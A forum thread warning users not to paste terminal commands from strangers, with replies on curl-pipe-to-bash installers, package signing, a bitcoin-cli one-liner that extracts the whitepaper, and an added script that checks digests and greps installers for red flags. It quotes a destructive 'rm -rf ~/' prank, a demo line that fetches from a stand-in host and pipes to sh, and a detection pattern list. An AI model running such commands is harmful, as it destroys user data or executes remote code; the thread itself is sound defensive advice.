With all the discussion around the Bitcoin whitepaper being discovered in macOS, I think it’s important to take a step back from a security perspective.
All of these posts on Twitter and elsewhere said “Open the terminal and run some command to see the Bitcoin whitepaper!” I’ve intentionally omitted the command here.
For those in the technology security industry, you’re aware of the risks of running an arbitrary command on the command line. But many others are not aware of the risk.
I want to put this simply:

Do NOT run commands directed by internet strangers in your terminal*

* unless you know what you’re doing
There are infinitely many bad things that can happen from copy-pasting some command into the terminal and running it. These can range from downloading malware, wiping your hard drive, exfiltrating sensitive data, etc.
In this particular case, the command was pretty transparent about what it was doing and was safe. But that’s not a guarantee.
Be careful folks.
561 sats \ 6 replies \ @ek 7 Apr 2023
Good post.
Websites which provide install instructions as curl <url> | bash are also very guilty of this.
reply
I don't see how this is any different from installing any other program on your computer. Most people using Windows just type in their admin password when installing stuff. And the people on Linux installing something with terminal instructions are basically the same thing.
reply
I see your point but I also see a difference between running random code and being susceptible to the issues mentioned in the article vs running code which is more or less guaranteed to do what you want:
A package manager is a common and welcome sight in the world of Linux-based operating systems. When installing software using a package manager we have a guarantee that all (or most) of the files used by the program will be tracked and accounted for and removed when uninstalling it. The same is true for various dependencies and the package manager also provides us with many other security measures such as ensuring that files belonging to an already installed program will not be overwritten by accident during the installation process. When executing an unknown script we don't know what is going to happen - we will not be able to easily find out what files were installed. This problem is mostly related to a simple necessity of keeping track of various entries in your file system. Imagine the chaos arising if every program was installed manually without the help of a package manager. This also exposes you to unpatched security issues as the installed program will not be automatically updated.
(also from the mentioned article)
Things not mentioned are for example checksums which are also checked automatically by package managers.
reply
In fact it goes further than that - pretty much every Linux package manager will refuse to even load packages from a repo unless the repo's PGP key matches up with the public key on your local system. You cannot add a new repo without adding the PGP key. If a malicious actor hacked the repo, they could not push out packages without also obtaining access to the private PGP key of the repo owner.
Windows users may be used to installing random executables, but Windows systems also tend to have a lot of malware. Linux has many extra layers of security vs Windows, which doesn't even have a package manager unless you install a third party one - same is true of macOS as well, if we're being fair.
Point is, when discussing Linux security, saying "but piping random scripts direct to bash with sudo is as secure as Windows" is basically the computing equivalent of "better love story than Twilight."
reply
Great addition, thanks.
Really interested to see if this changed @zuspotirko's mind
reply
Do people frequently install executables from Twitter posts?
reply
There is no difference if it's a Tweet or a Github ReadMe or a recommendation from a friend: if you don't know what you are installing you don't know what you're installing no matter the source
reply
I generally agree with you but
it's literally just open <path>.pdf. Like literally. One has to be a special kind of regarded to not know what they're doing. It doesn't get more simple than that
reply
Like I said, this one was transparent about what it was doing. But it sets a dangerous precedent.
reply
???
Are you aware how irrelevant this "precedent" is or are you mistaken about the meaning of the word "precedent"? People have been posting terminal commands on the internet for decades now.
That's like saying someone stealing from Walmart last week was a precedent. It's not. Theft has existed forever, it's not a "precedent"
reply
22 sats \ 1 reply \ @ek 7 Apr 2023
Maybe precedent is not the right term here. Maybe enabling bad behavior fits better?
I think the post was a bit ill-formulated. I think the post was less about that specific command but more generally about running random code without verifying or not taking any precautions.
At least that's how I read it.
reply
Yeah that's the message I got too. The terminal command in question is harmless, and OP explicitly says this along with saying it was transparent about what it is doing, but the point is to be wary of blindly pasting terminal commands if you are unsure about exactly what they do. It takes five seconds to paste them into Google before running them on your system.
It wasn't that long ago people were posting shit like "make your Mac 10x faster by running rm -rf ~/" and "delete system32 it's a virus" and yes people actually fell for that shit.
When people get into the habit of blindly trusting terminal commands without understanding what they're doing, they can easily fuck their shit up.
The tl;dr is simply "don't trust, verify."
reply
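The "don't trust, verify" advice above, and the earlier comments about package managers checking checksums and repo signing keys, come down to one habit for the curl | bash case: save the script, check its digest against a value published somewhere other than the download itself, read it, and only then run it. The script below is an added example written for this page; it is not code from the post, from any commenter, or from any real installer. The red-flag grep patterns are a heuristic chosen for illustration, the "installer" and its digest are constructed inline so the example runs offline, and a digest check is a weaker stand-in for the PGP signature verification apt or dnf do for you.

```shell
#!/bin/sh
# Added example: "save, verify, review, then run" instead of `curl <url> | bash`.
# The expected digest must come from a different channel than the download
# (release notes, a signed checksum file, package metadata). A hash served
# next to the script by the same server proves nothing.

sha256_of() {
    # sha256sum on Linux coreutils, shasum on macOS.
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{ print $1 }'
    else
        shasum -a 256 "$1" | awk '{ print $1 }'
    fi
}

# verify_digest FILE EXPECTED_HEX -> 0 if the SHA-256 matches, 1 otherwise.
# Never executes anything.
verify_digest() {
    actual=$(sha256_of "$1")
    if [ "$actual" != "$2" ]; then
        printf 'digest mismatch for %s\n  expected %s\n  got      %s\n' \
            "$1" "$2" "$actual" >&2
        return 1
    fi
}

# suspicious_lines FILE -> prints numbered lines matching crude red-flag patterns
# (recursive rm, decoded payloads, eval, piping to a shell, sudo, raw sockets).
# Heuristic only: no matches is not proof of safety, it is a prompt to read it.
suspicious_lines() {
    grep -nE 'rm -rf|base64 (-d|--decode)|eval |\| *(ba|z)?sh( |$)|sudo |/dev/tcp' "$1" || true
}

# run_verified FILE EXPECTED_HEX: execute only after the digest check passes.
run_verified() {
    verify_digest "$1" "$2" || return 1
    sh "$1"
}

# --- Constructed demo (not a real installer): a harmless script and a
# --- tampered copy that appends a "fetch and pipe to sh" line.
demo_dir=$(mktemp -d)
printf '%s\n' '#!/bin/sh' 'echo "installing demo tool (harmless)"' > "$demo_dir/install.sh"
cp "$demo_dir/install.sh" "$demo_dir/tampered.sh"
printf '%s\n' 'curl -s http://example.invalid/x | sh' >> "$demo_dir/tampered.sh"

# Pretend this value was published out-of-band; it is computed here only so the
# example runs offline.
published=$(sha256_of "$demo_dir/install.sh")

run_verified "$demo_dir/install.sh" "$published"
run_verified "$demo_dir/tampered.sh" "$published" || echo "refused to run tampered copy"
suspicious_lines "$demo_dir/tampered.sh"
rm -rf "$demo_dir"
```

The digest check catches a modified download; the grep only flags things worth reading closely. Neither replaces reading the script, and neither tells you whether the author of the script is trustworthy in the first place.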
Sure, but with this one liner you can download the bitcoin whitepaper pdf straight from the blockchain:
seq 0 947 | (while read -r n; do bitcoin-cli gettxout 54e48e5f5c656b26c3bca14a8c95aa583d07ebe84dde3b7dd4a78f4e4186e713 $n | jq -r '.scriptPubKey.asm' | awk '{ print $2 $3 $4 }'; done) | tr -d '\n' | cut -c 17-368600 | xxd -r -p > bitcoin.pdf
reply
Absolutely agree, very true
reply
Do NOT run commands directed by internet strangers in your terminal
*including chatbots (like claude.ai)
The LLMs may make honest mistakes today. I believe it's only a matter of time before they intentionally suggest code that has an ulterior motive which is sinister in ways that could benefit the AIs themselves, or their developers.
reply